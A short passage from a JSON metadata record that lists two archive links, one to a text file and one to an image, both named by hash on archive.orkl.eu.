		"text": "https://archive.orkl.eu/32e7e9e18d0785cf45592e6d76a9440c5d0d2d46.txt",
		"img": "https://archive.orkl.eu/32e7e9e18d0785cf45592e6d76a9440c5d0d2d46.jpg"
	}
}